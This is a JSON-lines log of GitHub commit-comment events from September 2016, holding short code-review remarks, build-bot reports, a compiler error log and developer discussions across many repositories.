{"id":"4606744125","type":"CommitCommentEvent","actor":{"login":"YuechuanLi"},"repo":{"name":"YuechuanLi/hello-world"},"payload":{"comment":{"id":19141363,"position":null,"line":null,"path":null,"commit_id":"25bdba50900fde3a4070e34c00f3990840da119c","created_at":"2016-09-23T06:03:59Z","updated_at":"2016-09-23T06:03:59Z","body":"test comments"}},"created_at":"2016-09-23T06:03:59Z"}
{"id":"4606744254","type":"CommitCommentEvent","actor":{"login":"xiaowasly"},"repo":{"name":"xiaowasly/xiaowasly.github.io"},"payload":{"comment":{"id":19141365,"position":null,"line":null,"path":null,"commit_id":"21ff5b4d623de0561b5d4384d7b1c9c9c0b209a0","created_at":"2016-09-23T06:04:02Z","updated_at":"2016-09-23T06:04:02Z","body":"delete"}},"created_at":"2016-09-23T06:04:02Z"}
{"id":"4606745374","type":"CommitCommentEvent","actor":{"login":"josercsulb"},"repo":{"name":"josercsulb/Hello-world"},"payload":{"comment":{"id":19141368,"position":null,"line":null,"path":null,"commit_id":"98a0a81380177689b30a4a115aac1c212656f334","created_at":"2016-09-23T06:04:27Z","updated_at":"2016-09-23T06:04:27Z","body":"I just finished applying for a job"}},"created_at":"2016-09-23T06:04:27Z"}
{"id":"4606746724","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19141370,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-23T06:04:59Z","updated_at":"2016-09-23T06:04:59Z","body":"用天翼新客户端登录时会弹出一个通知，那里写着旧客户端九月下旬停止使用，抓包的数据都换了。现在旧的客户端还没有停，所以旧的算法还可以使用"}},"created_at":"2016-09-23T06:04:59Z"}
{"id":"4606747136","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19141371,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T06:05:09Z","updated_at":"2016-09-23T06:05:09Z","body":"LTC run is doing great so far... :) Hopefully it stays that way."}},"created_at":"2016-09-23T06:05:09Z"}
{"id":"4606747868","type":"CommitCommentEvent","actor":{"login":"EdmondFrank"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19141373,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-23T06:05:25Z","updated_at":"2016-09-23T06:05:25Z","body":"@learnpace 方便的话，可以截图相关页面信息发送到我留的邮箱，由于我开发时并没有在过多高校的校园网环境下实验，局限性可能较大。"}},"created_at":"2016-09-23T06:05:25Z"}
{"id":"4606754229","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"TingYiShun/primitive"},"payload":{"comment":{"id":19141386,"position":null,"line":null,"path":null,"commit_id":"356e80a0380c325b1cfe74c75d22030136979e3b","created_at":"2016-09-23T06:07:50Z","updated_at":"2016-09-23T06:07:50Z","body":"This part is related to what I've studied during working time. \r\nfor i, job in enumerate(create_jobs(in_folder, out_folder, n, a, s, m)):\r\n -            key = (n, i, m)\r\n -            items.append((key, job))\r\n +        for item in create_jobs(in_folder, out_folder, n, a, s, m):\r\n +            items.append(item)\r\nOn top of that, there are some transport events which worth to participate.\r\nImages_, in some sorts."}},"created_at":"2016-09-23T06:07:50Z"}
{"id":"4606757985","type":"CommitCommentEvent","actor":{"login":"steghoja"},"repo":{"name":"Salome-Maro/TraceabilityManagement"},"payload":{"comment":{"id":19141392,"position":5,"line":66,"path":"org.eclipse.capra.documentation/docu/Capra Documentation.html","commit_id":"2c17a3a82041c0d0eb6aa9fe54392bbc908ae653","created_at":"2016-09-23T06:09:18Z","updated_at":"2016-09-23T06:09:18Z","body":"Instead of closing the HTML-Tag with an explicit </img>, close the tag itself:\r\n`<img src=\"../images/updatesite.png\" width=\"600\"/>`\r\nNote the slash at the end of the tag. That shows up in various other places but should be fixable with a search and replace."}},"created_at":"2016-09-23T06:09:18Z"}
{"id":"4606758093","type":"CommitCommentEvent","actor":{"login":"sbcgua"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19141394,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T06:09:20Z","updated_at":"2016-09-23T06:09:20Z","body":"mmm, now I'm confused :)\r\n\r\nadditionally: do you mean to show it both in the center and at side ? Or moving it completely to debug info page ?\r\nDebug page: I think it is good idea. It can be better formatted and with more info indeed. Much output at that corner will not look good and readable. "}},"created_at":"2016-09-23T06:09:20Z"}
{"id":"4606760393","type":"CommitCommentEvent","actor":{"login":"steghoja"},"repo":{"name":"Salome-Maro/TraceabilityManagement"},"payload":{"comment":{"id":19141397,"position":5,"line":7,"path":"org.eclipse.capra.documentation/plugin.xml","commit_id":"2c17a3a82041c0d0eb6aa9fe54392bbc908ae653","created_at":"2016-09-23T06:10:17Z","updated_at":"2016-09-23T06:10:17Z","body":"Spaces in file names are still problematic, even in 2016. Are you sure this will not cause a problem?"}},"created_at":"2016-09-23T06:10:17Z"}
{"id":"4606760949","type":"CommitCommentEvent","actor":{"login":"pascalgrimaud"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19141399,"position":5,"line":13,"path":"generators/generator-constants.js","commit_id":"c61490f8aef7e99c047685720f7ae5f28f4c4d19","created_at":"2016-09-23T06:10:31Z","updated_at":"2016-09-23T06:10:31Z","body":"@jdubois : I suppose you choose these images because they have a lot of stars+download and because there is no official image for kafka, right ?"}},"created_at":"2016-09-23T06:10:31Z"}
{"id":"4606763172","type":"CommitCommentEvent","actor":{"login":"ArclightHub"},"repo":{"name":"ArclightHub/Simple-CSGO-Ranks"},"payload":{"comment":{"id":19141402,"position":null,"line":null,"path":null,"commit_id":"d078b81ce9a3c6f623a273289f96b58b5059b446","created_at":"2016-09-23T06:11:23Z","updated_at":"2016-09-23T06:11:23Z","body":"Since people have started using this with a large number of users and on websites where the data is sorted these changes to the DB needed to be made."}},"created_at":"2016-09-23T06:11:23Z"}
{"id":"4606763527","type":"CommitCommentEvent","actor":{"login":"shotanaka0513"},"repo":{"name":"shotanaka0513/pictweet"},"payload":{"comment":{"id":19141403,"position":null,"line":null,"path":null,"commit_id":"6661648d31210fac15ae9245e79fac619262c25b","created_at":"2016-09-23T06:11:32Z","updated_at":"2016-09-23T06:11:32Z","body":"テスト"}},"created_at":"2016-09-23T06:11:32Z"}
{"id":"4606763694","type":"CommitCommentEvent","actor":{"login":"Legioth"},"repo":{"name":"vaadin/vaadin"},"payload":{"comment":{"id":19141404,"position":35,"line":75,"path":"server/src/main/java/com/vaadin/server/widgetsetutils/WidgetSetBuilder.java","commit_id":"4bc375d1d21f468e6433da3a183150e0bfe0cae4","created_at":"2016-09-23T06:11:36Z","updated_at":"2016-09-23T06:11:36Z","body":"This regression was fixed in https://dev.vaadin.com/ticket/20285 that was released in version 7.7.2."}},"created_at":"2016-09-23T06:11:36Z"}
{"id":"4606767043","type":"CommitCommentEvent","actor":{"login":"chrisgahlert"},"repo":{"name":"vaadin/vaadin"},"payload":{"comment":{"id":19141410,"position":35,"line":75,"path":"server/src/main/java/com/vaadin/server/widgetsetutils/WidgetSetBuilder.java","commit_id":"4bc375d1d21f468e6433da3a183150e0bfe0cae4","created_at":"2016-09-23T06:12:50Z","updated_at":"2016-09-23T06:12:50Z","body":"Awesome! Thx!"}},"created_at":"2016-09-23T06:12:50Z"}
{"id":"4606767636","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19141413,"position":null,"line":null,"path":null,"commit_id":"823bc93357da32a3a4a2b71b9915a4e124839d18","created_at":"2016-09-23T06:13:04Z","updated_at":"2016-09-23T06:13:04Z","body":"Also see [Issue 302: AES and incorrect argument to _freea() under Microsoft compilers](https://github.com/weidai11/cryptopp/issues/302). We backed out the 823 commit at [Commit f9ee4e2dab325869](http://github.com/weidai11/cryptopp/commit /f9ee4e2dab3258696770f6d786adbb508632df85)."}},"created_at":"2016-09-23T06:13:04Z"}
{"id":"4606774238","type":"CommitCommentEvent","actor":{"login":"Kevin-McIsaac"},"repo":{"name":"ywx649999311/des_ipyleaflet"},"payload":{"comment":{"id":19141426,"position":87,"line":665,"path":"js/src/jupyter-leaflet.js","commit_id":"2816b15a6e1e5a33094e31e7211a243b3f61abda","created_at":"2016-09-23T06:15:33Z","updated_at":"2016-09-23T06:15:33Z","body":"Just saw that and changed it but still not working. I checked the code had been modified and deployed as follows.\r\n\r\n```\r\nll.LayerGroup??\r\nInit signature: ll.LayerGroup(*args, **kwargs)\r\nSource:        \r\nclass LayerGroup(Layer):\r\n    _view_name = Unicode('LeafletLayerGroupView').tag(sync=True)\r\n    _model_name = Unicode('LeafletLayerGroupModel').tag(sync=True)\r\n\r\n    layers = List(Instance(Layer)).tag(sync=True, **widget_serialization)\r\n```"}},"created_at":"2016-09-23T06:15:33Z"}
{"id":"4606775874","type":"CommitCommentEvent","actor":{"login":"tchaikov"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":19141436,"position":44,"line":6349,"path":"src/osd/OSD.cc","commit_id":"c2b7cdbc72f21908e0225b15bbff0c7365706517","created_at":"2016-09-23T06:16:11Z","updated_at":"2016-09-23T06:16:11Z","body":"this is just wrong! `pcand` is an output parameter!"}},"created_at":"2016-09-23T06:16:11Z"}
{"id":"4606777580","type":"CommitCommentEvent","actor":{"login":"naris2bb"},"repo":{"name":"naris2bb/postcodify"},"payload":{"comment":{"id":19141441,"position":null,"line":null,"path":null,"commit_id":"cae0737d99033285232dc0c5cb7a68ed774f0a06","created_at":"2016-09-23T06:16:47Z","updated_at":"2016-09-23T06:16:47Z","body":"도로명 뒤에 지번주소 동 추가 (ko_doro_dongri)"}},"created_at":"2016-09-23T06:16:47Z"}
{"id":"4606787910","type":"CommitCommentEvent","actor":{"login":"arunsingh45"},"repo":{"name":"arunsingh45/HackerEarthCoding"},"payload":{"comment":{"id":19141473,"position":null,"line":null,"path":null,"commit_id":"4d77e55d31e0b97e07fbd671fc5a02deaa138d0c","created_at":"2016-09-23T06:20:37Z","updated_at":"2016-09-23T06:20:37Z","body":"Reversing the Array in groups entered by the user... -- Link:\r\nhttp://www.geeksforgeeks.org/reverse-an-array-in-groups-of-given-size/"}},"created_at":"2016-09-23T06:20:37Z"}
{"id":"4606790807","type":"CommitCommentEvent","actor":{"login":"yinggeABC"},"repo":{"name":"yinggeABC/weiminblog"},"payload":{"comment":{"id":19141479,"position":53,"line":69,"path":"routes/article.js","commit_id":"cb65d0f9baf848adc4cef4795f5bc78888e0d8ef","created_at":"2016-09-23T06:21:39Z","updated_at":"2016-09-23T06:21:39Z","body":"添加这个判断是为了防止提交的文章没有内容而抛出错误"}},"created_at":"2016-09-23T06:21:39Z"}
{"id":"4606793888","type":"CommitCommentEvent","actor":{"login":"naveendhruvsoft"},"repo":{"name":"naveendhruvsoft/Test-repository"},"payload":{"comment":{"id":19141488,"position":2,"line":2,"path":"test","commit_id":"499ef4d7dd9efffd01b3a3d1934748271abe3253","created_at":"2016-09-23T06:22:46Z","updated_at":"2016-09-23T06:22:46Z","body":"can i comment"}},"created_at":"2016-09-23T06:22:46Z"}
{"id":"4606798403","type":"CommitCommentEvent","actor":{"login":"xudafeng"},"repo":{"name":"macacajs/wd.java"},"payload":{"comment":{"id":19141498,"position":null,"line":null,"path":null,"commit_id":"040ebbe7acd8f7705b3e11cc5dc971ab06328b79","created_at":"2016-09-23T06:24:22Z","updated_at":"2016-09-23T06:24:22Z","body":"💯 "}},"created_at":"2016-09-23T06:24:22Z"}
{"id":"4606798700","type":"CommitCommentEvent","actor":{"login":"khdi"},"repo":{"name":"preciofishbone/Omnia-Foundation-Docs"},"payload":{"comment":{"id":19141499,"position":null,"line":null,"path":null,"commit_id":"a2ffcf6e0efc0452c22565b08c1f5b810f54fdbe","created_at":"2016-09-23T06:24:28Z","updated_at":"2016-09-23T06:24:28Z","body":"Good point"}},"created_at":"2016-09-23T06:24:28Z"}
{"id":"4606799860","type":"CommitCommentEvent","actor":{"login":"muglikar"},"repo":{"name":"panmari/caffe"},"payload":{"comment":{"id":19141504,"position":null,"line":null,"path":null,"commit_id":"08415681166967f9e22ffe189913feb2417f834b","created_at":"2016-09-23T06:24:52Z","updated_at":"2016-09-23T06:24:52Z","body":"Doing this change didn't solve my problem. Still getting this error:\r\n```\r\n\r\ncaffe$ make test -j4\r\nCXX/LD -o .build_debug/test/test_all.testbin src/caffe/test/test_caffe_main.cpp\r\nLD .build_debug/src/caffe/test/test_solver.o\r\nLD .build_debug/src/caffe/test/test_platform.o\r\nLD .build_debug/src/caffe/test/test_tile_layer.o\r\n/usr/bin/ld: /usr/local/lib/libglog.a(utilities.cc.o): undefined reference to symbol '_ULx86_64_step'\r\n/usr/lib/x86_64-linux-gnu//libunwind.so.8: error adding symbols: DSO missing from command line\r\ncollect2: error: ld returned 1 exit status\r\nMakefile:609: recipe for target '.build_debug/test/test_platform.testbin' failed\r\nmake: *** [.build_debug/test/test_platform.testbin] Error 1\r\nmake: *** Waiting for unfinished jobs....\r\n/usr/bin/ld: /usr/local/lib/libglog.a(utilities.cc.o): undefined reference to symbol '_ULx86_64_step'\r\n/usr/lib/x86_64-linux-gnu//libunwind.so.8: error adding symbols: DSO missing from command line\r\ncollect2: error: ld returned 1 exit status\r\nMakefile:609: recipe for target '.build_debug/test/test_tile_layer.testbin' failed\r\nmake: *** [.build_debug/test/test_tile_layer.testbin] Error 1\r\n/usr/bin/ld: /usr/local/lib/libglog.a(utilities.cc.o): undefined reference to symbol '_ULx86_64_step'\r\n/usr/lib/x86_64-linux-gnu//libunwind.so.8: error adding symbols: DSO missing from command line\r\ncollect2: error: ld returned 1 exit status\r\nMakefile:609: recipe for target '.build_debug/test/test_solver.testbin' failed\r\nmake: *** [.build_debug/test/test_solver.testbin] Error 1\r\n/usr/bin/ld: /usr/local/lib/libglog.a(utilities.cc.o): undefined reference to symbol '_ULx86_64_step'\r\n/usr/lib/x86_64-linux-gnu//libunwind.so.8: error adding symbols: DSO missing from command line\r\ncollect2: error: ld returned 1 exit status\r\nMakefile:597: recipe for target '.build_debug/test/test_all.testbin' failed\r\nmake: *** [.build_debug/test/test_all.testbin] Error 1\r\n```\r\nDebian GNU/Linux 8 (jessie) 64-bit\r\n\r\n```\r\ng++ --version\r\ng++ (Debian 4.9.2-10) 4.9.2\r\n```\r\n\r\nGives this error on make test -j4 \r\n\r\nHow to resolve?\r\n"}},"created_at":"2016-09-23T06:24:52Z"}
{"id":"4606804055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141513,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T06:26:19Z","updated_at":"2016-09-23T06:26:19Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T06:26:19Z"}
{"id":"4606806609","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141521,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T06:27:12Z","updated_at":"2016-09-23T06:27:12Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T06:27:12Z"}
{"id":"4606809072","type":"CommitCommentEvent","actor":{"login":"00dani"},"repo":{"name":"freakified/TimeStylePebble"},"payload":{"comment":{"id":19141534,"position":20,"line":262,"path":"src/c/sidebar.c","commit_id":"9eb6c018143fd301f5efd0a999d8b224bb3f290f","created_at":"2016-09-23T06:28:04Z","updated_at":"2016-09-23T06:28:04Z","body":"What's the point of the ternary operator here? Why not just write\r\n```c\r\nSidebarWidgets_useCompactMode = (totalHeight > compact_mode_threshold);\r\n```"}},"created_at":"2016-09-23T06:28:04Z"}
{"id":"4606809419","type":"CommitCommentEvent","actor":{"login":"NelsonFranklin"},"repo":{"name":"NelsonFranklin/githubexample"},"payload":{"comment":{"id":19141535,"position":null,"line":null,"path":null,"commit_id":"613e6eb937ffaaf2ce130cab63043e9e095c4ff7","created_at":"2016-09-23T06:28:12Z","updated_at":"2016-09-23T06:28:12Z","body":"package Collecxions;\r\nimport java.util.ArrayList;\r\n \r\npublic class ArrayListDemo2 {\r\n   public static void main(String[] args) {\r\n      ArrayList<String> st = new ArrayList<String>();  \r\n      st.add(\"Nelson\");           \r\n      st.add(\"Franklin\");\r\n      st.add(\"Mr.Frankz\");\r\n      System.out.println(st);     \r\n     // Iterator iter = lst.iterator();\r\n     for(Object obj:st){\t\t\t//for object we should use only strings\r\n      System.out.println(obj);\r\n     } \r\n      }\r\n   }"}},"created_at":"2016-09-23T06:28:12Z"}
{"id":"4606810821","type":"CommitCommentEvent","actor":{"login":"tauCross"},"repo":{"name":"51nb/51nb.github.io"},"payload":{"comment":{"id":19141548,"position":null,"line":null,"path":null,"commit_id":"565a775079a8bf1d1cebf13b94ebb1def6be95be","created_at":"2016-09-23T06:28:42Z","updated_at":"2016-09-23T06:28:42Z","body":"倪老板威武"}},"created_at":"2016-09-23T06:28:42Z"}
{"id":"4606813837","type":"CommitCommentEvent","actor":{"login":"tornadomeet"},"repo":{"name":"tornadomeet/ResNet"},"payload":{"comment":{"id":19141558,"position":null,"line":null,"path":null,"commit_id":"2042cc9fccab0bd488e93ed1311328b1de8eea48","created_at":"2016-09-23T06:29:46Z","updated_at":"2016-09-23T06:29:46Z","body":"yes, i'll merge this into `mxnet/example/image-classification` in the future."}},"created_at":"2016-09-23T06:29:46Z"}
{"id":"4606815248","type":"CommitCommentEvent","actor":{"login":"BeautyEmma"},"repo":{"name":"BeautyEmma/Ems"},"payload":{"comment":{"id":19141561,"position":null,"line":null,"path":null,"commit_id":"13972dcf53750a7d14fed9620d2118895ac55e37","created_at":"2016-09-23T06:30:16Z","updated_at":"2016-09-23T06:30:16Z","body":"ok"}},"created_at":"2016-09-23T06:30:16Z"}
{"id":"4606818238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141574,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T06:31:16Z","updated_at":"2016-09-23T06:31:16Z","body":"fix_gcc48_ICE (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T06:31:16Z"}
{"id":"4606820030","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19141580,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T06:31:56Z","updated_at":"2016-09-23T06:31:56Z","body":"The iterator pattern is one that is common to Java and Python. Go has iterators too; you've probably used them before:\r\n```go\r\nfor k, v := range m { ... }\r\n```\r\nCurrently, Go does not allow you to define your own type that can be `ranged` over. Any attempt at adding Generics to Go will probably need to find some way for arbitrary user-defined types to satisfy some type of `Ranger` interface or something.\r\n\r\nThat being said, it's not hard to define your own iterator-like functionality in your data structure, and it is totally fine (and often useful) to do. One way to do it is the following:\r\n```go\r\n// IterByDFS returns a iterator callback that iterates over the BinaryTree\r\n// in a depth-first manner. The callback returns nil when it is done iterating.\r\nfunc (bt *BinaryTree) IterByDFS() func() *Item { ... }\r\n```\r\n\r\nUsage:\r\n```go\r\niter := bt.IterByDFS()\r\nfor v := iter(); v != nil; v = iter() {\r\n    // Logic here.\r\n}\r\n```\r\n\r\nThis is just one pattern I came up with. There are many other approaches. The fact that there are many approaches is also one reason that it's hard coming up with a unified language-level construct for iterators.\r\n\r\nExample of iterator-like patterns in production code:\r\n* [github.com/boltdb/bolt.Bucket.Cursor](https://godoc.org/github.com/boltdb/bolt#Bucket.Cursor)\r\n* [container/list](https://golang.org/pkg/container/list/) - see example in overview.\r\n\r\n> Also - what is the difference between iterating and recursion (for traversing a DS)?\r\nThey are separate concepts. I would say that the connection occurs because iterating over a DS often involves recursion (but not always). For example, iterating over a slice is done with a simple for loop.\r\n"}},"created_at":"2016-09-23T06:31:56Z"}
{"id":"4606820451","type":"CommitCommentEvent","actor":{"login":"Gayathri2016"},"repo":{"name":"Gayathri2016/SimpleTodo"},"payload":{"comment":{"id":19141582,"position":null,"line":null,"path":null,"commit_id":"3ddc25d96cf1afc5f8d31c4c9e1b2419a2f8451f","created_at":"2016-09-23T06:32:02Z","updated_at":"2016-09-23T06:32:02Z","body":"merge commit"}},"created_at":"2016-09-23T06:32:02Z"}
{"id":"4606820823","type":"CommitCommentEvent","actor":{"login":"EdwardBX"},"repo":{"name":"cmusphinx/pocketsphinx"},"payload":{"comment":{"id":19141584,"position":25,"line":1314,"path":"src/libpocketsphinx/pocketsphinx.c","commit_id":"303d7c02589d24b22d7cca7ff25ac45c836aa481","created_at":"2016-09-23T06:32:09Z","updated_at":"2016-09-23T06:32:09Z","body":"thanks，that makes sense."}},"created_at":"2016-09-23T06:32:09Z"}
{"id":"4606820828","type":"CommitCommentEvent","actor":{"login":"RemieRichards"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19141585,"position":17,"line":117,"path":"osu.Framework/Graphics/Sprites/SpriteText.cs","commit_id":"c98d8d66ed77d993f3bf96539b2f18528d0a3e58","created_at":"2016-09-23T06:32:09Z","updated_at":"2016-09-23T06:32:09Z","body":"```\r\nforeach (Drawable D in keepDrawables)\r\n    Add(D);\r\n```\r\n\r\n(avoid the anonymous lambda)"}},"created_at":"2016-09-23T06:32:09Z"}
{"id":"4606823395","type":"CommitCommentEvent","actor":{"login":"GregOnNet"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19141594,"position":10,"line":10,"path":"src/app/book-monkey/iteration-5/directives/shared/zoom-book-cover.directive.ts","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T06:33:02Z","updated_at":"2016-09-23T06:33:02Z","body":"@d-koppenhagen Was genau tut `@HostListener`?"}},"created_at":"2016-09-23T06:33:02Z"}
{"id":"4606828000","type":"CommitCommentEvent","actor":{"login":"GregOnNet"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19141605,"position":2,"line":1,"path":"src/app/book-monkey/iteration-5/directives/book-list-item/book-list-item.component.html","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T06:34:44Z","updated_at":"2016-09-23T06:34:44Z","body":"`book?.thumbnails[0].url` kann immer noch kaputt gehen, wenn `thumbnails[0]  === undefined`, richtig?\r\n"}},"created_at":"2016-09-23T06:34:44Z"}
{"id":"4606830602","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19141618,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-23T06:35:36Z","updated_at":"2016-09-23T06:35:36Z","body":"In any case the approach here is not fit for a community driven project or even development in a team. A single individual is trying to dictate the course of action by applying closed software methods."}},"created_at":"2016-09-23T06:35:36Z"}
{"id":"4606830775","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19141619,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-23T06:35:39Z","updated_at":"2016-09-23T06:35:39Z","body":"I know, that it is sometimes hard. However some decisions should been made by the team. We always fight the so called community editions. Removing a working option makes no sense to me. When we have the profiles centralized, how do we differ them? Also by when you may think we have this \"solution\", which satisfies most of us?"}},"created_at":"2016-09-23T06:35:39Z"}
{"id":"4606835866","type":"CommitCommentEvent","actor":{"login":"FlorentRevest"},"repo":{"name":"AsteroidOS/supported-languages"},"payload":{"comment":{"id":19141630,"position":null,"line":null,"path":null,"commit_id":"a2320b655c20665afb1a5b229c78739065c5d407","created_at":"2016-09-23T06:37:25Z","updated_at":"2016-09-23T06:37:25Z","body":"Oops,, sorry stupid mistake done while wanting to do a quick and dirty commit... Fixed in the next commit"}},"created_at":"2016-09-23T06:37:25Z"}
{"id":"4606839792","type":"CommitCommentEvent","actor":{"login":"wanghongjuan"},"repo":{"name":"siovene/cordova-plugin-ocf-demo"},"payload":{"comment":{"id":19141636,"position":null,"line":null,"path":null,"commit_id":"1c17798489df2208255ee050105e4b91d97fffa1","created_at":"2016-09-23T06:38:43Z","updated_at":"2016-09-23T06:38:43Z","body":"Hi, @siovene , we had a internal review at first and I had a few days' leave. I will commit it as a pull-request later."}},"created_at":"2016-09-23T06:38:43Z"}
{"id":"4606841327","type":"CommitCommentEvent","actor":{"login":"wanghongjuan"},"repo":{"name":"siovene/cordova-plugin-ocf-demo"},"payload":{"comment":{"id":19141643,"position":6,"line":26,"path":"README.md","commit_id":"1c17798489df2208255ee050105e4b91d97fffa1","created_at":"2016-09-23T06:39:17Z","updated_at":"2016-09-23T06:39:17Z","body":"OK, I will update them."}},"created_at":"2016-09-23T06:39:17Z"}
{"id":"4606844951","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19141651,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-23T06:40:32Z","updated_at":"2016-09-23T06:40:32Z","body":"moving it completely to new debug page"}},"created_at":"2016-09-23T06:40:32Z"}
{"id":"4606845241","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19141653,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-23T06:40:39Z","updated_at":"2016-09-23T06:40:39Z","body":"@snicolet FYI: The position with the g1h2 move above arises in test-position number 2 called out from  qsearch futility pruning. \r\nHowever, since seeValue > 0, this particular position is not responsible for the changing the bench.\r\nAnyway the bench-changing illegal SEE moves arise still ther ein qsearch futility pruning,\r\nfor instance this position\r\n```\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k |   | n | r |\r\n +---+---+---+---+---+---+---+---+\r\n | p | p | p |   |   | p | p | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   | p |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | p |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   | b |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | N | P | P |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P | P | P |   |   | P | P | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R |   | B | Q | K | B | N | R |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqk1nr/ppp2ppp/4p3/3p4/1b6/2NPP3/PPP2PPP/R1BQKBNR w KQkq - 0 4\r\nKey: 2C5ADB50AA1DF3A5\r\nCheckers: \r\n\r\n```\r\nMove Nc3xd5 returns a negative see-score and thus bestValue get increased from -163 to -35,\r\nthis will most likely cause the first change in bench.\r\n\r\n"}},"created_at":"2016-09-23T06:40:39Z"}
{"id":"4606845372","type":"CommitCommentEvent","actor":{"login":"jmingov"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19141654,"position":null,"line":null,"path":null,"commit_id":"53ab16424cd37d147aca09ca8c15e45d2adb896d","created_at":"2016-09-23T06:40:42Z","updated_at":"2016-09-23T06:40:42Z","body":"Nice"}},"created_at":"2016-09-23T06:40:42Z"}
